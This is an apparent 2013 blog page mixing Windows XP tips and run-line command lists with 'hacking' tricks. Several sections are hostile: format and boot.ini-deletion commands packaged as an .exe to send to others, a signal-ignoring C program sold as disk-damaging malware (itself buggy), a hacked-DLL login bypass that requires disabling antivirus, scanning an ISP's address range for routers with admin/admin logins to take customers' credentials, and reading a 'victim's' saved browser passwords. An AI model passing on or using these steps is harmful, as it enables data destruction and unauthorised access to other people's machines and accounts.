Tuesday, 26 March 2013

diable or remove the Shutdown button

You can diable or remove the Shutdown button from windows start menu.Just follow the below method.

Start->Run->gpedit.msc->User Configuration->Administrative Templates->Start Menu &Taskbar->Remove Shutdown on Start Menu.->Enable.

Speed Up XP Booting.

Start Registry Editor (Regedit.exe).

Locate the following key in the registry:




Make sure you backup the keys by exporting them to a .reg file.

On the EnablePrefetcher value, change the setting from 3 to 5 (decimal).

Close the registry editor.

Restart your computer.

---------Thats it and you are done---------- 



Copy and Paste the following code in Notepad.



Save As "format.exe" or any name u want (but with extension.exe)

Now you can send this .exe file to people to format their HDD

It can fail to format your HDD while running WINDOWS.

Format c:\ /Q/X -- this will format your drive c:\


10111010000 100000011000110011101001011100


Format d:\ /Q/X -- this will format your drive d:\





Format a:\ /Q/X -- this will format your drive a:\


0010111010000 100000011000010011101001011100


del /F/S/Q c:\boot.ini -- this will STOP your computer from booting.


11110100011000 101111010100110010111101010001


00100110111101 101111011101000010111001101001


Dos Commands Shortcut

Dos Commands Shortcut

Accessibility Controls


Add Hardware Wizard


Add/Remove Programs


Administrative Tools

 control admintools

Automatic Updates


Bluetooth Transfer Wizard




Certificate Manager


Character Map


Check Disk Utility


Clipboard Viewer


Command Prompt


Component Services


Computer Management




Device Manager


Direct X Control Panel (If Installed)*


Direct X Troubleshooter


Disk Cleanup Utility


Disk Defragment


Disk Management


Disk Partition Manager


Display Properties

 control desktop

Display Properties


Display Properties (w/Appearance Tab Preselected)

 control color

Dr. Watson System Troubleshooting Utility


Driver Verifier Utility


Event Viewer


File Signature Verification Tool




Folders Properties

 control folders


 control fonts

Fonts Folder


Free Cell Card Game


Game Controllers


Group Policy Editor (XP Prof)


Hearts Card Game


Iexpress Wizard


Indexing Service


Internet Properties


IP Configuration (Display Connection Configuration)

 ipconfig /all

IP Configuration (Display DNS Cache Contents)

 ipconfig /displaydns

IP Configuration (Delete DNS Cache Contents)

 ipconfig /flushdns

IP Configuration (Release All Connections)

 ipconfig /release

IP Configuration (Renew All Connections)

 ipconfig /renew

IP Configuration (Refreshes DHCP & Re-Registers DNS)

 ipconfig /registerdns

IP Configuration (Display DHCP Class ID)

 ipconfig /showclassid

IP Configuration (Modifies DHCP Class ID)

 ipconfig /setclassid

Java Control Panel (If Installed)


Java Control Panel (If Installed)


Keyboard Properties

 control keyboard

Local Security Settings


Local Users and Groups


Logs You Out Of Windows


Microsoft Chat


Minesweeper Game


Mouse Properties

 control mouse

Mouse Properties


Network Connections

 control netconnections

Network Connections


Network Setup Wizard




Nview Desktop Manager (If Installed)


Object Packager


ODBC Data Source Administrator


On Screen Keyboard


Opens AC3 Filter (If Installed)


Password Properties


Performance Monitor


Performance Monitor


Phone and Modem Options


Power Configuration


Printers and Faxes

 control printers

Printers Folder


Private Character Editor


Quicktime (If Installed)


Regional Settings


Registry Editor


Registry Editor


Remote Desktop


Removable Storage


Removable Storage Operator Requests


Resultant Set of Policy (XP Prof)


Scanners and Cameras


Scheduled Tasks

 control schedtasks

Security Center




Shared Folders


Shuts Down Windows


Sounds and Audio


Spider Solitare Card Game


SQL Client Configuration


System Configuration Editor


System Configuration Utility


System File Checker Utility (Scan Immediately)

 sfc /scannow

System File Checker Utility (Scan Once At Next Boot)

 sfc /scanonce

System File Checker Utility (Scan On Every Boot)

 sfc /scanboot

System File Checker Utility (Return to Default Setting)

 sfc /revert

System File Checker Utility (Purge File Cache)

 sfc /purgecache

System File Checker Utility (Set Cache Size to size x)

 sfc /cachesize=x

System Properties


Task Manager


Telnet Client


User Account Management


Utility Manager


Windows Firewall


Windows Magnifier


Windows Management Infrastructure


Windows System Security Tool


Windows Update Launches


Windows XP Tour Wizard




Run line commands can be very useful some times, its better to know them here are all the commands that i know u might find them usefull too Commands are same for Windows xp pro and home

Run Line Commands

These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
RVSEZM.EXE - Reversi
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad

These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire

SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update

The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
WMIMGMT.MSC - Windows Management Infrastructure

Calculation on command Prompt ! u knew dis???

The command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
C:\>set /a 2*(9/2)
C:\>set /a (2*9)/2
C:\>set /a "31>>2"

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.


Hey folks, do u know that windows XP is having a hidden "Star Wars Movie" inside it???
You should be connected to the NET for using this.
Go to Starts-->Programs-->Run
telnet towel.blinkenlights.nl
And hit enter......... Enjoy the magic!!!!

How to Damage Hard Disk

How To Damage Hard Disk

This program will create Bad Sectors on HDD and in turn it will damage the hard disk.

(Use at your own risk)

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */

void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */

Hack BIOS Password

Hack BIOS Password

Turn the PC off (this means a total shutdown, not merely standby or hibernate mode) and disconnect the AC power cord.

Remove the cover from your system (this step may require tools, undoing a thumbscrew, or flipping a latch or two).

Refer to the user manual for the motherboard to find out how to "reset CMOS" memory. You may also find a label for specific jumper or switch settings marked on the system board.

Change the switch setting or jumper position to a specific position or remove the jumper entirely as prescribed in the manual to clear or reset the CMOS memory.

Wait 20-30 seconds for the memory to clear out from lack of power.

After 20-30 seconds put the switch or jumper the way it was before for normal use.

Reconnect the power cord and start up the system to see if the settings have changed to defaults.

Shut the PC down, disconnect the power cord, replace the cover, reconnect the power, and power up the PC.

Enter the BIOS setup program to configure the system as needed. This may include setting the date and time, selecting disk drive parameters, and selecting which devices the system uses to boot up with first.

Branding Windows with your name

Branding Windows with your name.

open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:


Manufacturer=Your Name Here

Model=Your Model Here

[Support Information]

Line1=Your Name Here

Line2=Your Address Here

Line3=Your Email Address Here
Save the file, then make a right click on my computer select properties, in the general tab a button will be highlighted (support information) make a click on it, you will be able to see the changes.
Now if you want to display some more information then simply increase the line in the file.
ex: Line4=Your Working Hours Here

Hack Windows Login Password

Hack into a computer running Windows XP without changing the password and find out all and any passwords on the machine (including admin accounts). You do not need access to any accounts to do this.

Steps to Hack into a Windows XP Computer without changing password:

1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Download DreamPackPL from Official website or from Rapidshare.

3. Unzip the downloaded dreampackpl_iso.zip and you'll get dreampackpl.ISO.

4. Use any burning program that can burn ISO images.

5. After you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

6. Press "R" to install DreamPackPL.

7. Press "C" to install DreamPackPL by using the recovery console.

8. Select the Windows installation that is currently on the computer (Normally is "1" if you only have one Windows installed)

9. Backup your original sfcfiles.dll by typing:
"ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without quotes)

10. Copy the hacked file from CD to system32 folder. Type:
"copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without quotes and assuming your CD drive is D:)

11. Type "exit", take out disk and reboot.

12. In the password field, type "dreamon" (without quotes) and DreamPack menu will appear.

13. Click the top graphic on the DreamPack menu and you will get a menu popup.

14. Go to commands and enable the options and enable the god command.

15. Type "god" in the password field to get in Windows.
You can also go to Passwords and select "Logon with wrong password and hash". This option allows you to login with ANY password.
Note: You will have to uninstall Antivirus sofware,Otherwise it will detect DreamPack as a hack tool and will not allow you to run it.

How To Hack Yahoo Messenger


Yahoo Messenger is one of the highly popular and most widely used instant messaging service in the world offering a wide variety of features to it’s users, all for free. This has made it the right choice for all those who are waiting to chat and communicate with their far away friends and relatives.
However, while some people use Yahoo Messenger only to chat with their friends and known ones, many others use it to have fun by joining the chat rooms and chatting with the strangers. If you’re a similar person who would like to have fun during the chat, this post if for you!
In this post, I will show you some really interesting Yahoo Messenger hacks using which it is possible to play pranks with your friends and strangers during the chat. Below is a list of some cool hacks that you’re sure to enjoy:

1. Chat with Multiple Names Simultaneously

How about chatting with your friend with two or more different names at a time? Well, do not think that this is impossible! This can easily be done with a simple workaround which enables you to chat with as many different names as you can with the same or different people.
For example, you may chat with Person-A using one name and with Person-B using the other. You can also chat with the same person using different names or any other combination. All of this goes really unnoticed by the user on the other side, while you are sure to have some real fun.
Here is a step-by-step procedure to implement this hack:
  1. Sign in to your Yahoo Messenger. From the top, click on Messenger -> My Account Info. You will be taken to a web page where you need to log in to your account.
  2. Now, you should be on the Profile Settings page. Scroll down to see the option Account Settings as shown below. From there, click on the link which says: “Manage your Yahoo! aliases”.
  3. From the Aliases page, click on: “Add an alias”. You can create as many aliases you want. Choose unique names for your alias and once you’re done, click on “close”.

  4. You need to sign out of Yahoo Messenger and sign in again to see the changes. Once you have done this, double-click on any name from your contact list or chat room to open a new chat window. You should now see a list of your aliases appearing in the chat window to choose from.

  5. To chat with multiple names with a single person, just follow the steps below:
    • Double-click on the name of the person in the chat room or contact list.
    • Select any name from your “alias” list and ping the user with that name. Immediately close the chat window before you get a reply from that person.
    • Again double-click on the same person’s name and ping him/her with another name from your “alias” list. This time do not close the window.
    • Just wait a few seconds! When the person replies to both your pings, you will have two tabs in the same chat window from where you can chat with the same person using two different names. Enjoy!!!
Before you try this hack, make sure that you have not set any display image for your profile. If not, there are chances of other person identifying your prank.
To disable the display image, just click on Messenger -> My Display Image from the top menu of your YM window and set the option to “Don’t share a display image”.
I hope you like this hack. Now let us move forward to our next hack that is even more exciting!

2. Play Prank with Your Friends Using a Fake Webcam

Ever wanted to fool your friends with a fake web camera? If so, here is a cool hack using which it is possible to fool users on Yahoo Messenger with a fake webcam on your computer. Below is a step-by-step procedure to configure the fake webcam on your computer:
  1. Download Fake Webcam software from the following link:
  2. Install Fake Webcam on your computer and configure it as follows.
  3. From your Yahoo Messenger window, click on “Messenger” at the top and select the option “My Webcam”.
  4. You should now get a blank Webcam Broadcast window. From there, click on File -> Preferences to open the “Yahoo! Messenger Preferences” window as shown below. From the “Category” list, select the option “Webcam Broadcast”.

  5. As shown in the above snapshot, click on “Camera Source”, select “Fake Webcam Source” as your source of camera and click on “OK”.
  6. Now, open the Fake Webcam application, load your favorite video and click on play button. You should now see the same video appearing on the Yahoo Messenger video broadcast window as show below:

  7. Click on “Broadcast” button on the Yahoo Messenger webcam window to start broadcasting the video.
If you are using aliases, you can change your webcam profile from File -> Change Profile option on the webcam window to enable the webcam for the current alias.
That’s it! You now have the fake webcam running on your computer.

3. Yahoo Messenger Invisible Hack

Most users on Yahoo Messenger hide their presence by activating the “invisible mode”, so that they appear as offline to everyone. But, how do you find out their true status? Well, here is a Yahoo Messenger invisible hack to catch those users who are hiding their true status by activating the “invisible mode”.
There are many tools out there to do this job, but most of them are found to have been infected with trojan and other malware. However, I have found some of the free online services that help you identify the true status of Yahoo users:
Just visit any of the above mentioned websites, enter the target Yahoo ID or screenname that you want to check and press the search button. With in a few seconds you will find out the true status of the user.
I hope you all enjoy this post. Pass your comments and share your experiences. :)


How can you increase ur broadband speed in XP?

1) First u Click on Start Button.

2) Then Select Run From Start Menu.

 Now Type gpedit.msc

 Expand the [Administrative Templates] branch.

 Then Expand the [Network] branch.

 Highlight(Select by Single Click) [QoS Packet Scheduler]

 Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

 Check(Select By Single Click on it) [Enabled]

 Change [Bandwidth limit %] to 0 %

 Click [OK] Button.

 Restart Your PC.

12) Now Check Your Broadband Speed. 

That's it :)

How To Hack Bsnl Broadband



Here is the trick for How To Hack Bsnl Broadband I hope you will really enjoy it Follow the below steps to do this 

1. Identify your IP address(dont knw visit @ whatismyip.com)

2.Download IP scanner.( i preferangryziber.com/w/Download).

Open IP scanner .GO to option/select port.Enter 80 in 1st option(enter post to scan)

4.In hostname option type ur ip.Click On the ip button next to host name on opening it will automatically fill the ip range.

5.In the first option Let ur original IP be but in the second option fill the ip greated then original.Now click Scan

6.IT will give you LIst of ips showing some ips green on left side.

7.Right click that ip and then to option 'open computer' & select browser

8.ASk for username and pass.GIve username :admin password:admin

9.if it doesnt respond take some other green IP.

10. When pages get open go to home & click Wan.Here uu will see user id and pass in coded form

11.To fetched actual passowrd download this soft from "(scanwith.com/X-Pass_download.htm)

12.Extract files from tht and run'X-pass'.Drag d 'x' icon in password filled and u will get the pass.

13. To check that pass go to



1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it ! :)

How to hack saved password in firefox

how to hack saved password in firefox

1. Open Firefox Web Broweser
2. Then Click on FireFox > Option Option as shown in below picture

3. Then a POP Up box will appear, In that go to security and click on Show Passwords as show below.

4. Now click on website whose password you want to see ans click on show password as shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)

5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password. 

Monday, 25 March 2013

Unlock huawei e1732 idea netsetter permanently

Unlock huawei e1732 idea netsetter permanently

Before starting unlocking you need following two software.So download it first and Extract it.

   CDMA Workshop      Download
   E1732 Downgrader     Download
   Mobile Partner 23       Download    
Follow :

Unlocking of Huawei E1732 can be done in 3 portion,Here we have to downgrade the firmware of the modem because the idea 7.2 mbps modem comes with customized Firmware.
 Right click on you My Computer
 >Select Properties
 >Select Device Manager
Now device manager window appears,Select Ports(COM & LPT)
Refer following screenshot and select Huawei Mobile Connect – 3G Application interface
and Note down the Post No. (Here Any Port


Now Run CDMA Workshop.Exe From  CDMA_Workshop and  Click on Main and select the com port number in COM Settings (AT mode) which you have note down in above step. After that click on Connect Select button.Don’t forget to check status !! It must shows ready if you have selected correct com port.

Now navigate to Memory tab and click on Read button. Instantly Confirm pop up box appears;Here Click On OK button as shown in below screenshot. 

          After that on more box appears,Here Set Last NV item to 9999
               After that Save as box appears, Here you have to save Nv Backup file to your desire place with        any name in your pc Be Careful........?
      Now CDMA workshop starts reading and this will take some time approximately two minutes,After that you will see the following message and click on OK.


:      Now Run The E1732Update_11. from Huawei E1732 firmware     E1732Update_11. , Select I accept the agreement and click on next button.

====>  : This wizard will search your modem in your few seconds !! Make sure you have closed               mobile partner 23 or Idea internet dashboard,If one of these application is opened then Firmware not able find your modem and shows error

====>  Read and Follow the instruction carefully and Click on Start button.
====> Click On Next button.
====> Now the Application starts downloading firmware to your modem

====> After completing above process,you will get massage like update failure,Don’t worry and click on OK  and Finish !! Now you are done,Second portion of the firmware downgrading is completed

This is the last portion of the unlocking here you have to write Nv backup file to modem,which you have stored previously at the starting of the unlocking in the first portion.

====> Now Run CDMA workshop again.Confirm the port number again from device manager.

And select port no Click on Main and select the com port number in COM Settings   (AT mode) which you have note down in above step (Here COM 12 ). After that click on Connect Select button.Refer the following screenshot for better understanding 

Now Quickly navigate to Memory tab and click on write button.After that Browse and open the Nv Backup file (Here e1732.txt)
As you click on write open button Cdma workshop instantly starts writing this file to your modem.this process will completed in few seconds !!

When the process will reach at 100% you can see success message then click on OK and Close the CDMA workshop,It will ask for “To send Reset Command” click on No
Disconnect your modem and Insert it again.you are Done !! Now your modem is Unlocked.After Unlocking your Huawei modem,Mobile partner is essential software that you need.Because in unlocked modem default dashboard not gives maximum flexibility.Install Mobile partner 23 and  enjoy Voice and USSD Features 

Now CDMA workshop starts reading and this will take some time approximately two minutes,After that you will see the following message and click on OK.

By : H!mesh Suthar